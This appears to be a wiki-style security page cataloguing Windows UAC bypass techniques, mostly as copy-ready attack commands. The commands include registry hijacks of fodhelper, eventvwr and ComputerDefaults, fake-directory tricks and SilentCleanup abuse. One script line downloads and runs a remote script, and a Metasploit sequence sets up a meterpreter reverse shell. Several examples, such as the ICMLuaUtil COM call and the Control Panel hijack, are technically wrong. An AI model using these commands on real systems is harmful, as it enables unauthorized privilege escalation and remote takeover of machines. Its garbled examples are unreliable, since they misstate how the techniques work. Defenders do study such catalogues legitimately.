Windows UAC Bypass Techniques

Bypassing User Account Control (UAC) by Spoofing Trusted Directories

Introduction

Welcome to a detailed exploration of an innovative method to bypass the User Account Control (UAC) in Windows 10 Build 17134. This article will discuss the structure and vulnerabilities of UAC, introducing a newly discovered bypass method. It is important to note that Microsoft does not consider UAC a security boundary, but it remains a critical layer for defense in depth. Here, I will share a technique that, although complex, reveals significant vulnerabilities within the Windows permission system.

What is UAC?

User Account Control (UAC) is a feature in Windows that helps prevent unauthorized changes to the system by requiring administrative privileges to be confirmed before performing actions that could affect the system's operation or change settings that affect other users. UAC prompts help prevent malware from performing privileged actions without the user's knowledge.

UAC Operation

When an action requiring elevated privileges is needed, UAC interacts with the user to confirm the operation. There are exceptions where some executables are pre-authorized by the system to run with elevated privileges without prompts, depending on specific security checks that verify the executable's integrity and authenticity.

UAC Bypass: The Directory Spoofing Technique

Requirement 1: Auto-Elevation of Privileges

appinfo.dll processes requests for privilege escalation through RPC calls, where it checks if the executable has an "autoElevate" key set to true in its manifest. If true, the executable is considered trustworthy for auto-elevation.

Requirement 2: Signature Verification

The executable must also pass a signature check using the WinVerifyTrust function. This ensures that only applications signed by trusted entities can auto-elevate.

Requirement 3: Execution from a Trusted Directory

Finally, the executable needs to be located in a directory considered secure by the system, such as C:\Windows\System32.

Bypass Strategy

The technique exploits the strict verification of trusted directories by manipulating paths. By creating a directory named "C:\Windows\ " (note the space), we can fool the initial path verification performed by Windows.

Bypass Implementation

Creating the Spoofed Directory: We use the CreateDirectory function with the "\?" prefix to bypass system naming restrictions and create the spoofed directory.
Copying an Authorized Executable: We move an auto-elevating executable, such as winSAT.exe, to the fake directory.
Executing the Executable: When winSAT.exe is run from the fake directory, the system performs the elevation of privileges as if it were from a trusted directory.

Scheduled Tasks Bypass

Description: This method involves creating a scheduled task that executes with elevated privileges, thus bypassing UAC.

Command Example:

# Create a scheduled task to run a PowerShell script with elevated privileges
schtasks /create /tn "MyTask" /sc once /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\Script.ps1" /st 00:00
schtasks /run /tn "MyTask"
schtasks /delete /tn "MyTask" /f

Environment Variable Manipulation

Description: By modifying environment variables that Windows checks before executing certain trusted binaries, attackers can redirect these executions to malicious files.

Command Example:

# Temporarily modify the environment path to include a malicious directory
set PATH=C:\Malicious;%PATH%
start trustedbinary.exe

Event Viewer Bypass

Description: A classic technique where the Microsoft Management Console (MMC) related to the event viewer is hijacked to execute a malicious payload.

Command Example:

# Use eventvwr to execute a custom MMC snap-in
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /t REG_SZ /d "cmd.exe /c start C:\Path\To\Malicious\payload.exe" /f
eventvwr.exe
reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f

Mock Folders Bypass

Description: Exploiting the way Windows handles file paths to trick the system into executing a malicious program from a mock system directory.

Command Example:

# Create a mock system folder and place a malicious executable disguised as a trusted system utility
mkdir "C:\Windows \System32"  # Notice the space after Windows
copy C:\Path\To\Malicious\executable.exe "C:\Windows \System32\trustedutility.exe"
start "C:\Windows \System32\trustedutility.exe"

Token Impersonation

Description: This method involves creating a token that has high privileges and then impersonating that token to perform elevated operations.

Command Example:

# Use Invoke-TokenManipulation from PowerSploit to impersonate a token
Import-Module .\PowerSploit\Exfiltration\Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

Bypass Using SilentCleanup

Description: This technique exploits the Windows "SilentCleanup" task, which runs with elevated privileges and does not prompt UAC.

Command Example:

# Place a malicious script in the location that SilentCleanup checks
$mPath = "C:\Windows\Temp\custom\malicious.ps1"
$triggerPath = "C:\Windows\System32\cleanmgr.exe"
New-Item -ItemType Directory -Path "C:\Windows\Temp\custom"
Set-Content -Path $mPath -Value "IEX (New-Object Net.WebClient).DownloadString('http://malicious.url/script')"
schtasks /create /tn "CleanUpMalicious" /xml "C:\Windows\System32\Tasks\Microsoft\Windows\DiskCleanup\SilentCleanup" /tr $triggerPath
schtasks /run /tn "CleanUpMalicious"
schtasks /delete /tn "CleanUpMalicious" /f

UAC Bypass via ICMLuaUtil Elevated COM Interface

Malware Examples: DarkSide, LockBit, TrickBot
Description: This technique utilizes the ICMLuaUtil COM interface, which is often allowed to bypass UAC due to its elevated privileges.

Command Example:

# Create an instance of the ICMLuaUtil interface and execute a command
$comObject = New-Object -ComObject "ICMLuaUtil"
$comObject.ShellExec("cmd.exe", "/c start notepad.exe", "", "runas", 1)

UAC Bypass via ComputerDefaults Execution Hijack

Malware Examples: ClipBanker, Quasar RAT
Description: Hijacks the execution path of ComputerDefaults.exe to run malicious code with elevated privileges.

Command Example:

# Hijack the executable path in the registry
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(Default)" -Value "cmd.exe /c calc.exe"
Start-Process "ComputerDefaults.exe"

UAC Bypass via Control Panel Execution Hijack

Malware Examples: AveMaria, Trojan.Mardom
Description: Modifies registry keys associated with Control Panel items to execute malicious payloads.

Command Example:

# Redirect Control Panel item to execute malicious code
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "DelegateExecute" -Value "C:\Path\To\Malicious\payload.exe"
Start-Process "control.exe"

UAC Bypass via DiskCleanup Scheduled Task Hijack

Malware Examples: RedLine Stealer, Glupteba
Description: Utilizes the Disk Cleanup task, which typically runs with elevated privileges, to execute malicious scripts.

Command Example:

# Place malicious script in Disk Cleanup task location
schtasks /create /tn "CleanUpTask" /tr "C:\Malicious\script.bat" /sc once /st 00:00
schtasks /run /tn "CleanUpTask"

UAC Bypass via FodHelper Execution Hijack

Malware Examples: Glupteba, BitAT dropper
Description: Abuses the auto-elevation setting of fodhelper.exe to execute without UAC prompts.

Command Example:

# Use fodhelper to bypass UAC
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Force
Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "DelegateExecute" -Value ""
Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "(Default)" -Value "cmd.exe /c start powershell.exe -ExecutionPolicy Bypass -NoExit -Command 'Start-Process notepad.exe -Verb runAs'"
Start-Process fodhelper.exe

UAC Bypass Attempt via Windows Directory Masquerading

Malware Examples: Remcos RAT
Description: This method involves creating a directory that masquerades as a system directory to trick Windows into executing a malicious payload.

Command Example:

# Create a masquerading Windows directory and execute a payload
mkdir "C:\Windows \System32"
echo "Malicious script" > "C:\Windows \System32\malicious.bat"
start "C:\Windows \System32\malicious.bat"

Metasploit UAC Bypass

Description: Metasploit offers several modules specifically designed to bypass UAC, leveraging known vulnerabilities and techniques.

Metasploit Command Example:

# Use Metasploit to exploit UAC
msfconsole
use multi/handler
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [YourLocalIP]
set LPORT 4444
exploit
use exploit/windows/local/bypassuac
<-------->
use exploit/windows/local/bypassuac_sluihijack
set payload windows/x64/meterpreter/reverse_tcp
<-------->
use exploit/windows/local/bypassuac_fodhelper

This Metasploit module will attempt to bypass UAC on a target Windows machine to deliver a reverse shell to the attacker.

Silent Process Exit Bypass

Description: Uses the Silent Process Exit registry keys to execute arbitrary commands with elevated privileges without triggering UAC.

Command Example:

# Setting Silent Process Exit to execute a malicious payload
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v "ReportingMode" /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v "MonitorProcess" /d "C:\Path\To\Malicious\payload.exe" /f

App Paths Bypass

Description: Manipulates the application paths in the registry to redirect the execution of legitimate applications to malicious executables.

Command Example:

# Manipulate App Paths to redirect to a malicious executable
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\calc.exe" -Name "(Default)" -Value "C:\Path\To\Malicious\payload.exe"
Start-Process "calc.exe"

Mocking Trusted Directories

Description: Involves creating directories that mock trusted paths to mislead the system into executing malicious files, thinking they are trusted applications.

Command Example:

# Create a mock directory and execute a malicious file
mkdir "C:\Program Files\TrustedDir"
copy "C:\Path\To\Malicious\file.exe" "C:\Program Files\TrustedDir\trustedapp.exe"
start "C:\Program Files\TrustedDir\trustedapp.exe"

Conclusion

This UAC bypass method, while effective, highlights the need for ongoing revision of security policies and access control implementations by Microsoft. Sharing and understanding these techniques is crucial to strengthening defenses against attacks that seek to exploit gaps in seemingly robust security mechanisms.

References

PreviousPrivilege Escalation NextObtaining SYSTEM privilege via a vulnerable driver using a Userland program

Last updated 1 year ago